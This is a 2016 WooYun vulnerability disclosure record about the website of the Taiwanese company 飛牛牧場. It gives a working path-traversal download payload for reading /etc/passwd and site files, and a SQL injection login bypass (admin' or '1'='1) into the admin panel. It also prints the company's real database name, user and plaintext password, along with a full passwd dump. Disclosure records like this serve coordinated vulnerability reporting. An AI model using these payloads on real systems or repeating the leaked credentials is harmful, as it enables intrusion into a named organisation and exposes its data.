当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168938

漏洞标题:飛牛牧場設計缺陷任意文件下載(存在注入)(臺灣地區)

相关厂商:飛牛牧場

漏洞作者: 路人甲

提交时间:2016-01-11 13:40

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

rt

详细说明:

目标:http://**.**.**.**
1.任意文件下载
构造,

http://**.**.**.**/cn/download.php?f=/cn/index.php


4.png


配置信息

http://**.**.**.**/cn/download.php?f=/cn/info.php


info.php中

$DEF_dbServer = "**.**.**.**";
$DEF_dbName = "flyingco";
$DEF_dbUser = "flyingco";
$DEF_dbPswd = "anan6av9";


passwd下载

http://**.**.**.**/cn/download.php?f=/../../../etc/passwd


passwd中

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
messagebus:*:100:101:User for D-Bus:/var/run/dbus:/bin/false
sshd:*:101:102:SSH daemon:/var/lib/sshd:/bin/false
usbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin
ntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/false
statd:x:103:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
nullmail:x:104:105::/var/lock/svc/nullmailer:/bin/true
mysql:x:60:106:MySQL database admin:/var/lib/mysql:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
polkitd:x:499:498:User for polkitd:/var/lib/polkit:/sbin/nologin
+::::::


2.注入
用admin'登录,报错

1.png


构造

admin' or '1'='1


进入后台

2.png


3.png

漏洞证明:

4.png


1.png


2.png


passwd中

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
messagebus:*:100:101:User for D-Bus:/var/run/dbus:/bin/false
sshd:*:101:102:SSH daemon:/var/lib/sshd:/bin/false
usbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin
ntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/false
statd:x:103:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
nullmail:x:104:105::/var/lock/svc/nullmailer:/bin/true
mysql:x:60:106:MySQL database admin:/var/lib/mysql:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
polkitd:x:499:498:User for polkitd:/var/lib/polkit:/sbin/nologin
+::::::

修复方案:

..

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-12 02:14

厂商回复:

感謝通報

最新状态:

暂无